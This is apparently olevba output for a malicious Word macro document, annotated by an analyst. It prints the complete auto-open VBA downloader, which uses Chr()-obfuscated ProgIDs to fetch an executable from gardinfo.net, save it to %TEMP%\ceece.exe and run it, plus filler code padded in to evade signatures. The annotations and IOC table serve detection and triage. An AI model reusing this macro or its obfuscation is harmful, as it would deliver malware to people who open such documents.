- olevba 0.31 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OpX:MASIH--V malware.docm
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: malware.docm
- Type: OpenXML
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- '' Auto-executing entry point: Word runs autoopen as soon as the document is opened,
- '' so everything below is reached with no user interaction beyond enabling macros.
- '' The only job here is to reach FBFILE_FORMAT_1 (the download-and-run routine in
- '' Module3) through VEeve; the argument 8.2 is never used by the callee.
- Sub autoopen()
- VEeve (8.2)
- End Sub
- '' Indirection layer between the AutoExec trigger and the payload. FFFFF is ignored;
- '' the extra hop only separates "autoopen" from the suspicious calls in a keyword scan.
- Sub VEeve(FFFFF As Long)
- FBFILE_FORMAT_1
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: word/vbaProject.bin - OLE stream: u'VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- '':::::
- '' Dead filler: this and the other h*/path*/str* routines are FreeBASIC compiler
- '' source pasted in as padding. No caller exists in this listing, and the constants
- '' (FB_TK_*, AST_OP_*, FB_ERRMSG_EXPECTEDRELOP) and the dfd object are not defined
- '' anywhere here. Presumably present to dilute the suspicious-keyword ratio and
- '' defeat simple signatures - treat it as noise when triaging.
- Static Function _
- hFBrelop2IRrelop _
- (ByVal tk As _
- Integer) As Integer
- Dim op As Integer
- Select Case tk
- Case FB_TK_EQ
- op = AST_OP_EQ
- Case FB_TK_GT
- op = AST_OP_GT
- Case FB_TK_LT
- op = AST_OP_LT
- Case FB_TK_NE
- op = AST_OP_NE
- Case FB_TK_LE
- op = AST_OP_LE
- Case FB_TK_GE
- op = AST_OP_GE
- Case Else
- dfd.errReport (FB_ERRMSG_EXPECTEDRELOP)
- '' error recovery: fake an op
- op = AST_OP_EQ
- End Select
- '' Note: op is computed but never assigned to the function result.
- End Function
- '' "Drop" step of the chain. pathIsAbsolute_4 is the ADODB.Stream created in
- '' FBFILE_FORMAT_1 (already filled with the downloaded bytes); pathIsAbsolute_3 is
- '' the %TEMP%\ceece.exe path built there. SaveToFile option 2 is
- '' adSaveCreateOverWrite, so an existing file at that path is silently replaced.
- '' A Word process writing an .exe into %TEMP% is the observable to alert on.
- Public Sub mp3_cbr_aktivate(pathIsAbsolute_4 As Object, pathIsAbsolute_3 As String)
- pathIsAbsolute_4.savetofile pathIsAbsolute_3, 2
- End Sub
- '':::::
- '' Dead filler (no caller in this listing). The body never assigns the function
- '' result, so it would always return 0 regardless of filename.
- Static Function _
- hFileExists _
- (ByVal filename As _
- String) As Integer
- Dim f As Integer
- f = FreeFile
- Close #f
- End Function
- '':::::
- '' Dead filler (no caller in this listing): a C-style pointer loop from FreeBASIC
- '' (`s = s + 1` advances a pointer) with the pointer types dropped. As VBA the
- '' assignment `c = s` would raise a type mismatch for non-numeric text, so this
- '' can never do the upper-casing its name suggests.
- Static Sub _
- hUcase _
- (ByVal src As String _
- , ByVal dst As _
- String)
- Dim c As Integer
- Dim s
- Dim d
- s = src
- d = dst
- Do
- c = s
- If (c >= 97) Then
- If (c <= 122) Then
- c = c - (97 - 65)
- End If
- ElseIf (c = 0) Then
- Exit Do
- End If
- d = c
- s = s + 1
- d = d + 1
- Loop
- '' null-term
- d = 0
- End Sub
- '':::::
- '' Dead filler (no caller in this listing). The CHAR_* constants are not defined
- '' anywhere here; like hUcase this is a de-pointered FreeBASIC loop.
- Static Sub _
- hClearName _
- (ByVal src As String)
- Dim p
- p = src
- Do
- Select Case p
- Case 0
- Exit Do
- Case CHAR_AUPP To CHAR_ZUPP, CHAR_ALOW To CHAR_ZLOW, CHAR_0 To CHAR_9, CHAR_UNDER
- Case Else
- p = CHAR_ZLOW
- End Select
- p = p + 1
- Loop
- End Sub
- '' Downloader stage. KJB is unused. Once hCurDir_2 strips the "<", "=" and ";"
- '' padding, the Chr() expression on the first line is the ProgID "Microsoft.XMLHTTP".
- '' The Open call is a synchronous GET (async flag False) to the URL the IOC table
- '' below lists, hxxp://gardinfo[.]net/435rg4/3245rd2.exe, and the raw responseBody
- '' is handed back to FBFILE_FORMAT_1 to be written to disk. Network egress from the
- '' Word process to that host is the detection hook for this stage.
- Public Function usZ5pw3gU8(KJB As Long)
- Dim httpRequest: Set httpRequest = hCurDir_2(Chr(77) & Chr(105) & Chr(60) & "c" & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(59) & Chr(46) & Chr(88) & "M" & Chr(60) & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
- httpRequest.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & "/" & "/" & "g" & "a" & Chr(114) & Chr(100) & Chr(105) & Chr(110) & Chr(102) & Chr(111) & "." & Chr(110) & Chr(101) & Chr(116) & Chr(47) & Chr(52) & "3" & Chr(53) & Chr(114) & Chr(103) & Chr(52) & Chr(47) & Chr(51) & Chr(50) & Chr(52) & Chr(53) & Chr(114) & Chr(100) & Chr(50) & Chr(46) & "e" & Chr(120) & "e", False
- httpRequest.Send
- usZ5pw3gU8 = httpRequest.responseBody
- End Function
- '' Searches backwards for the last '.' while still behind '/' or '\'.
- '' Dead filler (only referenced by hStripExt, itself uncalled). `for i as integer`,
- '' `path[i]`, `function =` and the #If preprocessor lines are FreeBASIC, not VBA.
- Private Function hFindExtBegin(ByRef path As String) As Integer
- for i as integer = len( path )-1 to 0 step -1
- select case( path[i] )
- Case Asc(".")
- return i
- #If DEFIND_FB_WIN32_ Or DEFIND_FB_DOS_ Then
- Case Asc("\"), Asc("/")
- #Else
- Case Asc("/")
- #End If
- Exit For
- End Select
- Next
- function = len( path )
- End Function
- '' Dead filler (no caller in this listing); `function =` is FreeBASIC syntax.
- Function hStripExt(ByRef path As String) As String
- function = left( path, hFindExtBegin( path ) )
- End Function
- '':::::
- '' Dead filler (no caller in this listing): FreeBASIC source verbatim
- '' (`zstring ptr`, `dim as integer`, `*filename`, `function =`); RSLASH is undefined here.
- function hStripPath _
- ( _
- byval filename as zstring ptr _
- ) as string static
- dim as integer lp, p_found, p(1 to 2)
- lp = 0
- Do
- p(1) = instr( lp+1, *filename, RSLASH )
- p(2) = instr( lp+1, *filename, "/" )
- If p(1) = 0 Or (p(2) > 0 And p(2) < p(1)) Then
- p_found = p(2)
- Else
- p_found = p(1)
- End If
- If (p_found = 0) Then
- Exit Do
- End If
- lp = p_found
- Loop
- If (lp > 0) Then
- function = mid( *filename, lp+1 )
- Else
- function = *filename
- End If
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: word/vbaProject.bin - OLE stream: u'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- '' Dead filler (no caller in this listing): FreeBASIC source verbatim (`uinteger`,
- '' `zstring * 8 + 1`, `@res`, `*p`, `shr =`). Not valid VBA; ignore when triaging.
- Public Function hHexUInt _
- ( _
- ByVal value As uinteger _
- ) As String
- static as zstring * 8 + 1 res
- dim as zstring ptr p
- dim as integer lgt, maxlen
- static as integer hexTB(0 to 15) = _
- { _
- asc( "0" ), asc( "1" ), asc( "2" ), asc( "3" ), _
- asc( "4" ), asc( "5" ), asc( "6" ), asc( "7" ), _
- asc( "8" ), asc( "9" ), asc( "A" ), asc( "B" ), _
- asc( "C" ), asc( "D" ), asc( "E" ), asc( "F" ) _
- }
- maxlen = 4
- If (value > 65535) Then
- maxlen = 8
- End If
- p = @res + 8-1
- lgt = 0
- Do
- *p = hexTB( value and &h0000000F )
- lgt +=1
- If (lgt = maxlen) Then
- Exit Do
- End If
- p -= 1
- value shr = 4
- Loop
- function = p
- End Function
- '' Dead filler (no caller in this listing): FreeBASIC (`cptr`, `ulongint ptr`,
- '' `@value`, `function =`); typeGet and FB_DATATYPE_DOUBLE are undefined here.
- Function hFloatToHex _
- ( _
- ByVal value As Double, _
- ByVal dtype As Integer _
- ) As String
- '' Emit the raw bytes that make up the float
- '' x86 little-endian assumption
- If (typeGet(dtype) = FB_DATATYPE_DOUBLE) Then
- function = "0x" + hex( *cptr( ulongint ptr, @value ), 16 )
- Else
- dim as single singlevalue = value
- '' Using an intermediate uinteger to allow compiling with FB
- '' versions before the overload resolution overhaul
- function = "0x" + hex( cuint( *cptr( ulong ptr, @singlevalue ) ), 8 )
- End If
- End Function
- '' Dead filler (no caller in this listing): FreeBASIC source verbatim (`ulongint`,
- '' `shr`, `1ull shl 52`, `iif` with `@"+"`, `return`). Not valid VBA.
- Function hFloatToHex_C99 _
- ( _
- ByVal value As Double _
- ) As String
- '' float hex format defined in C99 spec: e.g. 0x1.fp+3
- dim as ulongint n = *cptr( ulongint ptr, @value )
- dim as integer sign = n shr 63
- dim as integer exp2 = (n shr 52) and (1u shl 11 - 1)
- dim as ulongint mantissa = n and (1ull shl 52 - 1)
- dim as string ret
- If (Sign <> 0) Then
- '' negative
- ret = "-0x"
- Else
- '' positive
- ret = "0x"
- End If
- exp2 -= 1023
- If (exp2 > -1023) Then
- '' normalized
- ret += "1." + hex( mantissa, 13 )
- If Right(ret, 1) = "0" Then ret = RTrim(ret, "0")
- Else
- If mantissa = 0 Then
- '' zero
- ret += "0"
- exp2 = 0
- Else
- '' denormed
- exp2 += 1
- ret += "0." + hex( mantissa, 13 )
- If Right(ret, 1) = "0" Then ret = RTrim(ret, "0")
- End If
- End If
- ret += "p" & (*iif( exp2 >= 0, @"+", @"-" )) + str( abs( exp2 ) )
- return ret
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: word/vbaProject.bin - OLE stream: u'VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- '':::::
- '' Dead filler (no caller in this listing): same FreeBASIC loop as hStripPath in
- '' Module2, returning the directory part instead. RSLASH and `*filename` are not VBA.
- Function hStripFilename _
- ( _
- ByVal filename As String _
- ) As String
- dim as integer lp, p_found, p(1 to 2)
- lp = 0
- Do
- p(1) = instr( lp+1, *filename, RSLASH )
- p(2) = instr( lp+1, *filename, "/" )
- If p(1) = 0 Or (p(2) > 0 And p(2) < p(1)) Then
- p_found = p(2)
- Else
- p_found = p(1)
- End If
- If (p_found = 0) Then
- Exit Do
- End If
- lp = p_found
- Loop
- If (lp > 0) Then
- function = left( *filename, lp )
- Else
- function = ""
- End If
- End Function
- '':::::
- '' Dead filler (no caller in this listing): FreeBASIC source verbatim
- '' (`zstring ptr`, `*fname`, `res[0]`, `function =`); RSLASH is undefined here.
- function hGetFileExt _
- ( _
- byval fname as zstring ptr _
- ) as string static
- dim as integer p, lp
- dim as string res
- lp = 0
- Do
- p = instr( lp+1, *fname, "." )
- If (p = 0) Then
- Exit Do
- End If
- lp = p
- Loop
- If (lp = 0) Then
- function = ""
- Else
- res = lcase( mid( *fname, lp+1 ) )
- If InStr(res, RSLASH) > 0 Or InStr(res, "/") > 0 Then
- '' We had a folder with a "." inside ...
- function = ""
- ElseIf (Len(res) > 0) Then
- '' . or .. dirs?
- if( res[0] = asc( RSLASH ) or res[0] = asc( "/" ) ) then
- function = ""
- Else
- function = res
- End If
- End If
- End If
- End Function
- '' Dead filler (no caller in this listing). Opens with `sub` but closes with
- '' `End Function`, and uses FreeBASIC pointer indexing (`s[i]`); CHAR_RSLASH and
- '' CHAR_SLASH are undefined here.
- sub hReplaceSlash( byval s as zstring ptr, byval char as integer )
- for i as integer = 0 to len( *s ) - 1
- if( (s[i] = CHAR_RSLASH) or (s[i] = CHAR_SLASH) ) then
- s [i] = Char
- End If
- Next
- End Function
- '' Dead filler (only referenced by hCurDir, itself uncalled). `dim as integer`,
- '' `path[length]`, `return` and `function =` are FreeBASIC, not VBA.
- Function pathStripDiv(ByRef path As String) As String
- dim as integer length = len( path )
- If (length > 0) Then
- length -= 1
- select case( path[length] )
- #If defined__FB_WIN32__ Or defined__FB_DOS__ Then
- Case Asc("/"), Asc("\")
- #Else
- Case Asc("/")
- #End If
- return left( path, length )
- End Select
- End If
- function = path
- End Function
- '' Obfuscated CreateObject wrapper. Callers pass a ProgID padded with "<" (Chr(60)),
- '' "=" (Chr(61)) and ";" (Chr(59)); the three Replace calls remove the padding and
- '' the real ProgID is passed to CreateObject. Every COM object in the chain
- '' (Microsoft.XMLHTTP, ADODB.Stream, WScript.Shell, Shell.Application) is created
- '' here, so this one routine is the choke point to watch in a sandbox trace. Note
- '' the parameter is ByRef (the default), so the caller's string is rewritten too.
- Public Function hCurDir_2(UIlhbjkhoiyH As String)
- UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(60), "")
- UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(61), "")
- UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(59), "")
- Set hCurDir_2 = CreateObject(UIlhbjkhoiyH)
- End Function
- '' Dead filler (no caller in this listing): FreeBASIC (`(*path)[0]`, `function =`,
- '' #If blocks). Its name is reused for the variables in FBFILE_FORMAT_1, which is
- '' likely deliberate naming noise.
- Function pathIsAbsolute(ByVal path As String) As Integer
- #If defined__FB_WIN32__ Or defined__FB_DOS__ Then
- if( (*path)[0] <> 0 ) then
- select case( (*path)[1] )
- Case Asc(":")
- '' C:...
- function = TRUE
- #If def__FB_WIN32__ Then
- Case Asc("\")
- '' \\... UNC path
- function = ((*path)[0] = asc( "\" ))
- #End If
- End Select
- End If
- #Else
- '' /...
- function = ((*path)[0] = asc( "/" ))
- #End If
- End Function
- '' Download-and-execute payload, reached from autoopen -> VEeve. ProgIDs below are
- '' given after hCurDir_2 strips the "<", "=", ";" padding. pathIsAbsolute_1,
- '' pathIsAbsolute_2 and noextensionFile are never declared, so this module only
- '' compiles without Option Explicit. Observable sequence for detection: Word reads
- '' %TEMP%, performs an HTTP GET, writes an .exe into %TEMP%, then spawns it.
- Public Function FBFILE_FORMAT_1()
- '' "WScript.Shell" -> .Environment("Process") gives process environment variables.
- Set pathIsAbsolute_1 = hCurDir_2(Chr(87) & Chr(60) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
- '' "TEMP" -> value of %TEMP%.
- pathIsAbsolute_2 = pathIsAbsolute_1("T" & Chr(69) & Chr(77) & Chr(80))
- Dim pathIsAbsolute_4 As Object
- '' "ADODB.Stream" - used as the file writer.
- Set pathIsAbsolute_4 = hCurDir_2(Chr(65) & "<" & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & Chr(101) & "a" & Chr(59) & Chr(109))
- Dim pathIsAbsolute_3 As String
- '' Drop path: %TEMP%\ceece.exe (matches the IOC table).
- pathIsAbsolute_3 = pathIsAbsolute_2 + "\ce" & Chr(101) + "ce." & "e" & Chr(120) & Chr(101)
- With pathIsAbsolute_4
- '' Type 1 = adTypeBinary; the downloaded bytes are written unmodified.
- .Type = 1
- .Open
- .write usZ5pw3gU8(223)
- End With
- '' SaveToFile with overwrite (see mp3_cbr_aktivate).
- mp3_cbr_aktivate pathIsAbsolute_4, pathIsAbsolute_3
- '' "Shell.Application" -> .Open launches the dropped executable.
- Set noextensionFile = hCurDir_2(Chr(83) & Chr(61) & "<" & "h" & "e" & Chr(108) & Chr(59) & Chr(108) & "<" & Chr(46) & Chr(65) & "p;" & Chr(112) & Chr(108) & Chr(105) & "<" & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
- noextensionFile.Open (pathIsAbsolute_3)
- End Function
- '' Dead filler (no caller in this listing): FreeBASIC BOM sniffing (`dim as long`,
- '' `get( #f, 0, BOM )`, `and=`, `function =`). FBFILE_FORMAT and the
- '' FBFILE_FORMAT_* constants are undefined here; the name only resembles the real
- '' payload routine FBFILE_FORMAT_1.
- Function hCheckFileFormat(ByVal f As Integer) As Integer
- dim as long BOM
- dim as FBFILE_FORMAT fmt
- '' little-endian assumptions
- fmt = FBFILE_FORMAT_ASCII
- if( get( #f, 0, BOM ) = 0 ) then
- If (BOM = &HFFFE0000) Then
- fmt = FBFILE_FORMAT_UTF32BE
- ElseIf (BOM = &HFEFF) Then
- fmt = FBFILE_FORMAT_UTF32LE
- Else
- BOM and= &h00FFFFFF
- If (BOM = &HBFBBEF) Then
- fmt = FBFILE_FORMAT_UTF8
- Else
- BOM and= &h0000FFFF
- If (BOM = &HFEFF) Then
- fmt = FBFILE_FORMAT_UTF16LE
- ElseIf (BOM = &HFFFE) Then
- fmt = FBFILE_FORMAT_UTF16BE
- End If
- End If
- End If
- Select Case fmt
- Case FBFILE_FORMAT_ASCII
- Seek #f, 1
- Case FBFILE_FORMAT_UTF8
- Seek #f, 1 + 3
- Case FBFILE_FORMAT_UTF16LE, _
- FBFILE_FORMAT_UTF16BE
- Seek #f, 1 + 2
- End Select
- End If
- function = fmt
- End Function
- '' Dead filler (only referenced by pathStripCurdir, itself uncalled). Not the
- '' CreateObject wrapper hCurDir_2 despite the similar name; `function =` is FreeBASIC.
- Function hCurDir() As String
- '' curdir() usually won't be terminated with a path separator,
- '' except when it points to the file system root, instead of
- '' some directory (e.g. C:\ on Win32 or / on Unix).
- function = pathStripDiv( curdir( ) )
- End Function
- '' Dead filler (no caller in this listing): `var` and `function =` are FreeBASIC;
- '' FB_HOST_PATHDIV is undefined here.
- Function pathStripCurdir(ByRef path As String) As String
- var pwd = hCurDir() + FB_HOST_PATHDIV
- If (Left(path, Len(pwd)) = pwd) Then
- function = right( path, len( path ) - len( pwd ) )
- Else
- function = path
- End If
- End Function
- '' Dead filler (no caller in this listing): FreeBASIC (`zstring ptr`, `var`,
- '' `orelse`, `sym[i]`, `function =`); hIsChar and hIsCharNumeric are undefined here.
- function hIsValidSymbolName( byval sym as zstring ptr ) as integer
- If (sym = Null) Then Exit Function
- var symlen = len( *sym )
- If (symlen = 0) Then Exit Function
- if( (hIsChar(sym[0]) orelse (sym[0] = asc("_"))) = FALSE ) then exit function
- for i as integer = 1 to symlen-1
- if( ((hIsChar(sym[i])) orelse (sym[i] = asc("_")) orelse (hIsCharNumeric(sym[i]))) = FALSE ) then exit function
- Next
- function = TRUE
- End Function
- '' Checks whether a string starts with and ends in [double-]quotes.
- '' Dead filler (only referenced by strUnquote, itself uncalled). `dim as integer`,
- '' `s[0]` indexing and `return` are FreeBASIC, not VBA.
- Private Function strIsQuoted(ByRef s As String) As Integer
- dim as integer last = len(s) - 1
- If (Last < 1) Then
- return FALSE
- End If
- return (((s[0] = asc("""")) and (s[last] = asc(""""))) or _
- ((s[0] = asc("'" )) and (s[last] = asc("'" ))))
- End Function
- '' Dead filler (no caller in this listing); `return <expr>` is FreeBASIC, not VBA.
- Function strUnquote(ByRef s As String) As String
- If (strIsQuoted(s)) Then
- return mid(s, 2, len(s) - 2)
- End If
- return s
- End Function
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | http://gardinfo.net/ | URL (obfuscation: VBA expression) |
- | | 435rg4/3245rd2.exe | |
- | IOC | 3245rd2.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- | IOC | ceece.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- +------------+----------------------+-----------------------------------------+